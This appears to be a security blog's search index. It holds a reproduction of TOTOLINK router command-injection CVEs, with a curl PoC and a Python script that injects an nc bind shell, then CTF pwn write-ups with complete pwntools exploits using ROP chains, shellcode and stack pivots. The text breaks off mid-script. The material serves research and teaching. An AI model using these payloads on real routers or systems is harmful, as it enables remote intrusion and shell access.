<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>CVE-2023-25395 reproduction</title>
<link href="/2025/01/15/CVE-2023-25395%E5%A4%8D%E7%8E%B0/"/>
<url>/2025/01/15/CVE-2023-25395%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="CVE-2023-25395复现"><a href="#CVE-2023-25395复现" class="headerlink" title="CVE-2023-25395 reproduction"></a>CVE-2023-25395 reproduction</h1><p>Firmware download: <a href="http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html">http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html</a></p><p>Affected versions:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251313748.png" alt="image-20230925131341626"></p><p>The vulnerable program is cstecgi.cgi under /usr/lib/lighttpd/web/cgi-bin.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251314399.png" alt="image-20230925131446362"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251314970.png" alt="image-20230925131450914"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251314444.png" alt="image-20230925131455421"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315724.png" alt="image-20230925131503658"></p><h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="Vulnerability analysis"></a>Vulnerability analysis</h2><p>Starting from the string setOpenVpnCertGenerationCfg and passing a value in the ou parameter eventually gives command injection. The discloser's PoC does not work as published: the report was filed as a batch and every entry reuses the first one's screenshot and method, so that PoC cannot be made to reach the sink. maur therefore worked out another path to the same command injection; the end result is identical.</p><p>The dispatch works as follows. strstr first points var at the input string setOpenVpnCertGenerationCfg. v22 is then loaded from off_44F048; if that is empty the program jumps to its end. v42 is pointed at var, i.e. the input string, and compared against v41 in a loop: on a mismatch v41 advances by 0x44 to the next candidate string, on a match v22 is loaded from v41+0x40 (IDA's pseudocode is wrong here, and stepping through the real code is also awkward), which is 0x4327fc, the handler for this topic.</p><p>Inside that handler the program fetches the content of the ou parameter into v14 and passes v14 to Uci_Set_Str. There snprintf formats the value matched by a4 into v11, and v11 goes to cstesystem, which hands the user-controlled string straight to execv. Nothing on that path validates or escapes the value. (execv itself interprets no metacharacters, so for the injection to work the vector it receives must run a shell on that string, which is exactly what the PoC's $(...) relies on.)</p><h2 id="固件模拟"><a href="#固件模拟" class="headerlink" title="Firmware emulation"></a>Firmware emulation</h2><p>We first tried two automated tools, FirmAE (me) and Firmadyne (maur); neither worked, because this firmware needs a specific CPU model passed to qemu.</p><p>So we fell back to full-system emulation with qemu. I first tried building a kernel and root filesystem with buildroot, but ran into a series of odd problems, and buildroot's mipsel image lacked a lot (ssh, for one), so in the end I used the Debian wheezy mipsel disk image from debian.org, debian_wheezy_mipsel_standard.qcow2, together with its kernel vmlinux-3.2.0-4-4kc-malta-el.</p><h3 id="1-启动qemu"><a href="#1-启动qemu" class="headerlink" title="1. Start qemu"></a>1. Start qemu</h3><p>This needs the network set up and the firmware's CPU model specified.</p><p>Start script:</p><pre><code class="hljs bash">#set network: host bridge virbr0 plus tap0 for the guest; the guest itself is configured as 192.168.182.12 inside Debian
sudo brctl addbr virbr0
sudo ifconfig virbr0 192.168.182.1/24 up
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.182.11/24 up
sudo brctl addif virbr0 tap0

# -cpu 24KEc is the CPU model this firmware needs (the reason the automated tools failed); kernel and disk image are the debian.org wheezy mipsel files
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta-el -cpu 24KEc -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic
</code></pre><h3 id="2-将固件的文件系统传进qemu虚拟机"><a href="#2-将固件的文件系统传进qemu虚拟机" class="headerlink" title="2. Copy the firmware's filesystem into the qemu VM"></a>2. Copy the firmware's filesystem into the qemu VM</h3><p>The Debian image is noticeably more convenient here: the extracted root filesystem can simply be copied into the guest over ssh.</p><pre><code class="hljs bash">scp -r squashfs-root/ root@192.168.182.12:/root
</code></pre><h3 id="3-启动固件的web服务"><a href="#3-启动固件的web服务" class="headerlink" title="3. Start the firmware's web service"></a>3. Start the firmware's web service</h3><pre><code class="hljs bash"># inside the guest: chroot into the extracted firmware root (copied above as squashfs-root, named A7100RU here) and run lighttpd in the foreground
chroot A7100RU /bin/sh
./usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf -D
</code></pre><p>Pointing a browser at 192.168.182.12 now shows the router's page. Presumably because qemu's emulation differs somewhat from the real router, some of the JavaScript breaks and the page does not render completely, but that does not get in the way of reproducing the CVE.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315617.png" alt="image-20230925131510509"></p><h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>The parameters can be sent with Burp or with curl as a POST body; I used curl. (curl sends this body with its default form content type; cstecgi.cgi parses it as JSON regardless.)</p><pre><code class="hljs bash">curl http://192.168.182.12/cgi-bin/cstecgi.cgi -X POST -d '{"topicurl":"setOpenVpnCertGenerationCfg","ou":"1$(ls>/tmp/256.txt;)"}'
</code></pre><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315378.png" alt="image-20230925131517333"></p><p>The screenshot shows the response, and logging into the qemu VM over ssh confirms that the injected command created /tmp/256.txt.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315680.png" alt="image-20230925131521625"></p><h2 id="CVE-2022-41518-这个模拟的方式和前面也没差太多,漏洞也是一个命令注入,主要还是从exp学了点东西"><a href="#CVE-2022-41518-这个模拟的方式和前面也没差太多,漏洞也是一个命令注入,主要还是从exp学了点东西" class="headerlink" title="CVE-2022-41518: the emulation is much the same as above and the bug is again a command injection; the main takeaway was learning a bit from the exploit"></a>CVE-2022-41518: the emulation is much the same as above and the bug is again a command injection; the main takeaway was learning a bit from the exploit</h2><pre><code class="hljs python">import contextlib
import os

import requests

TARGET = "192.168.182.12"  # the emulated router
session = requests.Session()

# authenticate first, as the exploit does, so the handler is reached with a valid session
login_url = f"http://{TARGET}/formLoginAuth.htm?authCode=1&userName=admin&goURL=home.html&action=login"
session.get(login_url, timeout=5)

# command injection in the hostname field of setOpModeCfg (sprintf into a command line);
# the injected command starts a bind shell on port 9999
inject_url = f"http://{TARGET}/cgi-bin/cstecgi.cgi"
inject_data = {
    "proto": "8",
    "hostname": "';nc -l -p 9999 -e bash;'",
    "topicurl": "setOpModeCfg",
}

# the CGI blocks on the bind shell and never answers, so the 1 s timeout is expected
# to fire; the exception is suppressed on purpose
with contextlib.suppress(Exception):
    session.post(inject_url, json=inject_data, timeout=1)

print("shell!? ---------------> ")
os.system(f"nc {TARGET} 9999")
</code></pre><p>The command injection is in the handling of hostname, again a sprintf into a command line; nc -l -p 9999 -e bash inside that value gives a bind shell on port 9999, which the script then connects to.</p>]]></content>
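<![CDATA[<p>An added illustration of the sink described in the analysis above, covering both CVE-2023-25395 (the <code>ou</code> field reaching Uci_Set_Str and cstesystem) and CVE-2022-41518 (the <code>hostname</code> field reaching sprintf). This is example code written for this page, not code from the original post or from the TOTOLINK firmware. It models the vulnerable handler as a snprintf of the request field into a command line that a helper then runs through <code>/bin/sh -c</code> (an assumption about what cstesystem's execv call ends up doing; execv interprets no metacharacters itself, so a shell has to be on the path for the injection to work), and sets beside it a hardened handler that allowlists the value and builds an argv for a direct execv of the uci binary, so that even a value containing <code>$(</code> is one inert argument. The function names, the <code>uci set</code> command line, the key names and the allowlist policy are assumptions for the example (real UCI values may legitimately need a wider character set); the two request values are the ones from this post's PoCs.</p>

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define CMD_MAX 256

/* VULNERABLE pattern (models Uci_Set_Str -> cstesystem): the request field is
 * formatted straight into a command line that is later handed to "/bin/sh -c".
 * Whatever the shell treats specially in `value` ($(...), ;, ', |, &) runs.
 * The command line and key name are assumptions for the example. */
int uci_set_str_vulnerable(char *cmd, size_t cmdlen, const char *key, const char *value)
{
    int n = snprintf(cmd, cmdlen, "uci set %s=%s", key, value);   /* untrusted value */
    return (n < 0 || (size_t)n >= cmdlen) ? -1 : 0;
}

/* Allowlist for a certificate OU / hostname value: letters, digits, '-', '_', '.'.
 * This policy is an assumption for the example; the firmware applies none. */
int field_value_ok(const char *value, size_t maxlen)
{
    size_t len = strlen(value);
    if (len == 0 || len > maxlen)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!(isalnum(c) || c == '-' || c == '_' || c == '.'))
            return 0;
    }
    return 1;
}

/* HARDENED pattern: validate first, then build an argv for execv() of the uci
 * helper itself, with no "/bin/sh -c" in between. argv[2] is a single opaque
 * argument: even if the allowlist were loosened later, a "$(" inside it would
 * never reach a shell parser. Returns 0 and fills argv on success, -1 otherwise. */
int uci_set_str_hardened(char *argbuf, size_t buflen, const char *key, const char *value,
                         const char *argv[4])
{
    if (!field_value_ok(value, 64))
        return -1;
    int n = snprintf(argbuf, buflen, "%s=%s", key, value);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    argv[0] = "uci";
    argv[1] = "set";
    argv[2] = argbuf;
    argv[3] = NULL;
    return 0;   /* caller would fork() and execv("/sbin/uci", (char *const *)argv) */
}

int main(void)
{
    /* constructed inputs: the ou value from this post's curl PoC and the
     * hostname value from the CVE-2022-41518 script above */
    const char *poc_ou = "1$(ls>/tmp/256.txt;)";
    const char *poc_host = "';nc -l -p 9999 -e bash;'";
    char cmd[CMD_MAX], arg[CMD_MAX];
    const char *argv[4];

    if (uci_set_str_vulnerable(cmd, sizeof cmd, "openvpn.cert.ou", poc_ou) == 0)
        printf("vulnerable command line: %s\n", cmd);   /* $(...) intact, ready for sh -c */

    printf("hardened rejects ou PoC: %s\n",
           uci_set_str_hardened(arg, sizeof arg, "openvpn.cert.ou", poc_ou, argv) == -1 ? "yes" : "no");
    printf("hardened rejects hostname PoC: %s\n",
           uci_set_str_hardened(arg, sizeof arg, "network.wan.hostname", poc_host, argv) == -1 ? "yes" : "no");
    if (uci_set_str_hardened(arg, sizeof arg, "openvpn.cert.ou", "Engineering", argv) == 0)
        printf("hardened argv: %s %s %s\n", argv[0], argv[1], argv[2]);
    return 0;
}
```

<p>The two defences in the hardened version are independent: the allowlist stops both PoC values at the door, and exec'ing the helper without <code>sh -c</code> means that a later loosening of the allowlist cannot turn a value back into a command. Fixing only one of them leaves the sink one code change away from CVE-2023-25395 again.</p>
]]>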
</entry>
<entry>
<title>QiangWang Mimic (强网拟态) qualifier: PWN writeups</title>
<link href="/2024/10/28/%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81/"/>
<url>/2024/10/28/%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81/</url>
<content type="html"><![CDATA[<p>Luck was on our side: we made the finals.</p><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="signin"><a href="#signin" class="headerlink" title="signin"></a>signin</h2><p>A stack pivot with a rand() check in front of it; the seed comes from our own input, so the codes are predictable.</p><pre><code class="hljs python">from pwn import *
from ctypes import *

binary = "./vuln"
elf = ELF(binary)
libc = ELF("./libc.so.6")
# the challenge's libc loaded through ctypes, so rand() here reproduces the target's sequence
libc1 = cdll.LoadLibrary("./libc.so.6")

local = 0
if local:
    io = process(binary)
else:
    io = remote("pwn-0e0144d48f.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level='debug', os='linux', arch='amd64')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data: io.send(data)
sl = lambda data: io.sendline(data)
sa = lambda text, data: io.sendafter(text, data)
sla = lambda text, data: io.sendlineafter(text, data)
r = lambda: io.recv()
ru = lambda text: io.recvuntil(text)
uu32 = lambda: u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda: u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
uheap = lambda: u64(io.recv(6).ljust(8, b'\x00'))
lg = lambda data: io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda: io.interactive()

pop_rdi = 0x0000000000401893
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ret = 0x000000000040101a
pop_rbp = 0x000000000040127d
vuln = 0x00000000004013C0
read_ptr = 0x00000000004013CF    # re-entry point inside vuln, just before its read()
leave_ret = 0x00000000004013be

# the seed is taken from our input, so srand(0x41414141) reproduces all 100 authentication codes
payload = b'A' * 0x12
s(payload)
libc1.srand(0x41414141)
for i in range(100):
    num = libc1.rand() % 100 + 1
    print(num)
    ru("Input the authentication code:")
    s(p64(num))

ru(">>")
sl(p32(1))
ru("Note:")
sl(b'youlin')

# stage 1: leak libc with puts(puts@got), then return into vuln for another overflow
payload = b'A' * 0x100 + b'A' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
sl(payload)
io.recv()
libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 0x84420
lg("libcbase")
open = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
write = libcbase + libc.sym['write']
pop_rsi = libcbase + 0x000000000002601f
pop_rdx = libcbase + 0x0000000000142c92

# stage 2: point rbp into .bss and re-enter before read(), so the next read() lands in .bss
payload = b'A' * 0x100 + p64(elf.bss(0x400) + 0x100) + p64(read_ptr)
sl(payload)

# stage 3: open/read/write chain written into .bss; "flag\x00" sits right after the chain (0x404538)
orw = p64(pop_rdi) + p64(0x404538) + p64(pop_rsi) + p64(0) + p64(open)
orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(elf.bss(0x900)) + p64(pop_rdx) + p64(0x50) + p64(read)
orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(elf.bss(0x900)) + p64(pop_rdx) + p64(0x50) + p64(write) + b'flag\x00'

# the saved rbp / leave;ret pair at the end pivots rsp onto the chain
payload = orw + p64(pop_rbp) + p64(elf.bss(0xb48)) + p64(read)
payload = payload.ljust(0x100, b'\x00') + p64(elf.bss(0x400) - 0x8) + p64(leave_ret)
s(payload)

ia()
</code></pre><h2 id="signin-revenge"><a href="#signin-revenge" class="headerlink" title="signin_revenge"></a>signin_revenge</h2><p>Almost the same as the previous one, without the rand() check: straight to the stack pivot.</p><pre><code class="hljs python">from pwn import *

binary = "./vuln"
elf = ELF(binary)
libc = ELF("./libc.so.6")

local = 0
if local:
    io = process(binary)
else:
    io = remote("pwn-30cffcb888.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level='debug', os='linux', arch='amd64')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data: io.send(data)
sl = lambda data: io.sendline(data)
sa = lambda text, data: io.sendafter(text, data)
sla = lambda text, data: io.sendlineafter(text, data)
r = lambda: io.recv()
ru = lambda text: io.recvuntil(text)
uu32 = lambda: u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda: u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
uheap = lambda: u64(io.recv(6).ljust(8, b'\x00'))
lg = lambda data: io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda: io.interactive()

pop_rdi = 0x0000000000401393
ret = 0x000000000040101a
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln = 0x00000000004012C0
leave_ret = 0x00000000004012be
read_ptr = 0x00000000004012CF    # re-entry point inside vuln, just before its read()
pop_rbp = 0x000000000040117d

# stage 1: leak libc with puts(puts@got), then return into vuln for another overflow
ru("lets move and pwn!")
payload = b'A' * 0x100 + b'A' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
sl(payload)
io.recv()
libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 0x84420
lg("libcbase")
open = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
write = libcbase + libc.sym['write']
pop_rsi = libcbase + 0x000000000002601f
pop_rdx = libcbase + 0x0000000000142c92

# stage 2: point rbp into .bss and re-enter before read(), so the next read() lands in .bss
payload = b'A' * 0x100 + p64(elf.bss(0x400) + 0x100) + p64(read_ptr)
sl(payload)

# stage 3: open/read/write chain in .bss; "flag\x00" sits right after the chain (0x4044f8)
orw = p64(pop_rdi) + p64(0x4044f8) + p64(pop_rsi) + p64(0) + p64(open)
orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(elf.bss(0x900)) + p64(pop_rdx) + p64(0x50) + p64(read)
orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(elf.bss(0x900)) + p64(pop_rdx) + p64(0x50) + p64(write) + b'flag\x00'

# the saved rbp / leave;ret pair at the end pivots rsp onto the chain
payload = orw + p64(pop_rbp) + p64(elf.bss(0xb48)) + p64(read)
payload = payload.ljust(0x100, b'\x00') + p64(elf.bss(0x400) - 0x8) + p64(leave_ret)
s(payload)

ia()
</code></pre><h2 id="ezcode"><a href="#ezcode" class="headerlink" title="ezcode"></a>ezcode</h2><p>A short shellcode, submitted hex-encoded inside the JSON the challenge expects; it stages a second, larger open/read/write shellcode.</p><pre><code class="hljs python">from pwn import *

binary = "./vuln"
elf = ELF(binary)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

local = 1
if local:
    io = process(binary)
else:
    io = remote("pwn-ba1369d43c.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level='debug', os='linux', arch='amd64')

def dbg():
    gdb.attach(io, "b *$rebase(0x00000000000018A6)")
    pause()

s = lambda data: io.send(data)
sl = lambda data: io.sendline(data)
sa = lambda text, data: io.sendafter(text, data)
sla = lambda text, data: io.sendlineafter(text, data)
r = lambda: io.recv()
ru = lambda text: io.recvuntil(text)
uu32 = lambda: u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda: u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
uheap = lambda: u64(io.recv(6).ljust(8, b'\x00'))
lg = lambda data: io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda: io.interactive()

# stage 1: 22 bytes of machine code (44 hex characters) wrapped in the JSON field the binary reads
shellcode = b'c1e70c66ba070066b80a000f059931c089ce31ff0f05'
print(hex(len(shellcode)))
payload = b'{"shellcode":"' + shellcode + b'"}'
sl(payload)

# stage 2: open("flag" at 0x999800d), read(fd, 0x9998250, 0x100), write(1, 0x9998250, 0x100);
# the "flag\x00" path is the first 9 bytes of this send, the code follows it
shellcode = asm('''
    mov rdi,0x999800d
    xor esi,esi
    xor rdx,rdx
    xor rax,rax
    add rax,2
    syscall
    mov rdi,rax
    mov rsi,0x9998000+0x250
    add edx,0x100
    xor eax,eax
    syscall
    mov edi,1
    mov rsi,0x9998000+0x250
    mov rax,1
    syscall
    ''')
sl(b'flag\x00'.ljust(9, b'\x00') + shellcode)

ia()
</code></pre><h2 id="qwen"><a href="#qwen" class="headerlink" title="qwen"></a>qwen</h2><p>Heavily layered. There is an overflow: raise rsp and run a ROP chain, then use pwn2 to copy flag to flag_read, after which reading flag_read gives the flag directly.</p><pre><code class="hljs python">from pwn import *
from ctypes import *

binary = "./pwn1"
elf = ELF(binary)
libc = ELF("./libc.so.6")

local = 0
if local:
    io = process(binary)
else:
    io = remote("pwn-802264e403.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level='debug', os='linux', arch='amd64')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data: io.send(data)
sl = lambda data: io.sendline(data)
sa = lambda text, data: io.sendafter(text, data)
sla = lambda text, data: io.sendlineafter(text, data)
r = lambda: io.recv()
ru = lambda text: io.recvuntil(text)
uu32 = lambda: u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda: u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
uheap = lambda: u64(io.recv(6).ljust(8, b'\x00'))
lg = lambda data: io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda: io.interactive()

# the challenge's libc loaded through ctypes so that rand() matches the target
libc1 = cdll.LoadLibrary('./libc.so.6')
num = libc1.rand()

for i in range(5):
ru(<span class="hljs-string">"请输入下棋的位置(行 列):"</span>)<br> sl(<span class="hljs-string">"0 "</span>+<span class="hljs-built_in">str</span>(i))<br>ru(<span class="hljs-string">b'want to say?'</span>)<br>s(<span class="hljs-string">b'a'</span>*<span class="hljs-number">0x8</span>+<span class="hljs-string">b'\x08\x15'</span>)<br><br>ru(<span class="hljs-string">"Do you want to end the game [Y/N]\n"</span>)<br>sl(<span class="hljs-string">"N"</span>)<br><br>ru(<span class="hljs-string">":"</span>)<br>sl(<span class="hljs-string">"70 "</span>+<span class="hljs-built_in">str</span>(<span class="hljs-number">50</span>))<br>ru(<span class="hljs-string">b'administrator key'</span>)<br>sl(<span class="hljs-built_in">str</span>(num))<br><br>ru(<span class="hljs-string">"logged in!\n"</span>)<br>sl(<span class="hljs-string">"/proc/self/maps"</span>)<br>ru(<span class="hljs-string">"as follows >>\n"</span>)<br>base=<span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)<br>lg(<span class="hljs-string">"base"</span>)<br>io.recvline()<br>io.recvline()<br>io.recvline()<br>libcbase = <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)<br>lg(<span class="hljs-string">"libcbase"</span>)<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br>pop_rdi=libcbase+<span class="hljs-number">0x000000000002164f</span><br>add_rsp=libcbase+<span class="hljs-number">0x0000000000154553</span><span class="hljs-comment">#add rsp, 0x50 ; pop rbx ; pop rbp ; pop r12 ; ret</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>):<br> io.recvline()<br><br>stack = <span class="hljs-built_in">int</span>(io.recv(<span 
class="hljs-number">12</span>),<span class="hljs-number">16</span>) + <span class="hljs-number">0x1E518</span><br>lg(<span class="hljs-string">"stack"</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> ru(<span class="hljs-string">"请输入下棋的位置(行 列):"</span>)<br> sl(<span class="hljs-string">"0 "</span>+<span class="hljs-built_in">str</span>(i))<br><br>ru(<span class="hljs-string">b'want to say?'</span>)<br>payload=<span class="hljs-string">b'a'</span>*<span class="hljs-number">0x8</span>+p64(add_rsp)+p64(pop_rdi)+p64(pop_rdi) + p64(bin_sh) + p64(system)<br>s(payload)<br>ru(<span class="hljs-string">"Do you want to end the game [Y/N]\n"</span>)<br>sl(<span class="hljs-string">"N"</span>)<br>ru(<span class="hljs-string">"请输入下棋的位置(行 列):"</span>)<br>sl(<span class="hljs-string">"70 "</span>+<span class="hljs-built_in">str</span>(<span class="hljs-number">50</span>))<br><br><span class="hljs-comment"># sl(b'cd /home/ctf')</span><br><span class="hljs-comment"># sl(b'./pwn2 -c flag_read flag')</span><br><span class="hljs-comment"># sleep(10)</span><br><span class="hljs-comment"># sl(b'cat flag_read')</span><br><br><br>ia()<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202410200121631.png" alt="Screenshot 2024-10-19 215500"></p><h2 id="guest-book"><a href="#guest-book" class="headerlink" title="guest book"></a>guest book</h2><p>A standard menu heap challenge: glibc 2.35 with a use-after-free, so a large-bin attack on _IO_list_all followed by house of apple2 is enough.</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span 
class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><code class="hljs vim">from pwn import *<br>from ctypes import *<br>from struct import pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br>#libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = 
process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip,port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br>#context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'i386'</span>)<br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br><span class="hljs-keyword">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-keyword">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-keyword">sla</span> = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br><span class="hljs-keyword">ru</span> = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-keyword">b</span><span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br><span class="hljs-keyword">lg</span> = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span 
class="hljs-built_in">eval</span>(data)))<br><span class="hljs-keyword">ia</span> = lambda : io.interactive()<br><br>def cmd(choice):<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">">"</span>)<br> <span class="hljs-keyword">sl</span>(str(choice))<br><br>def <span class="hljs-built_in">add</span>(<span class="hljs-built_in">index</span>,size):<br> cmd(<span class="hljs-number">1</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your size"</span>)<br> <span class="hljs-keyword">sl</span>(str(size))<br><br>def <span class="hljs-keyword">edit</span>(<span class="hljs-built_in">index</span>,content):<br> cmd(<span class="hljs-number">2</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br> <span 